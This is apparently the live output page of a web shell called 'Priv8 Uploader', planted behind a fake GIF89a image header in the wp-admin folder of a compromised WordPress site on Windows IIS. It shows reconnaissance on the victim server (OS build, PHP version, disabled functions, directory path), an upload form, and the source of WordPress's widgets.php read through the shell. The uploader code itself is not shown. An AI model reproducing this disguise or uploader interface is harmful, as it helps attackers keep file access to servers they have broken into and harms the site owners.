GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64 User : 80.com ( 0) PHP Version : 7.4.33 Disable Function : passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec Directory : d:/wwwroot/80.com/wp-admin/ |
Upload File : |
<?php
/**
* Widget administration screen.
*
* @package WordPress
* @subpackage Administration
*/
/** WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';
/** WordPress Administration Widgets API */
require_once ABSPATH . 'wp-admin/includes/widgets.php';
if ( ! current_user_can( 'edit_theme_options' ) ) {
wp_die(
'<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' .
'<p>' . __( 'Sorry, you are not allowed to edit theme options on this site.' ) . '</p>',
403
);
}
if ( ! current_theme_supports( 'widgets' ) ) {
wp_die( __( 'The theme you are currently using is not widget-aware, meaning that it has no sidebars that you are able to change. For information on making your theme widget-aware, please <a href="https://developer.wordpress.org/themes/functionality/widgets/">follow these instructions</a>.' ) );
}
// Used in the HTML title tag.
$title = __( 'Widgets' );
$parent_file = 'themes.php';
if ( wp_use_widgets_block_editor() ) {
require ABSPATH . 'wp-admin/widgets-form-blocks.php';
} else {
require ABSPATH . 'wp-admin/widgets-form.php';
}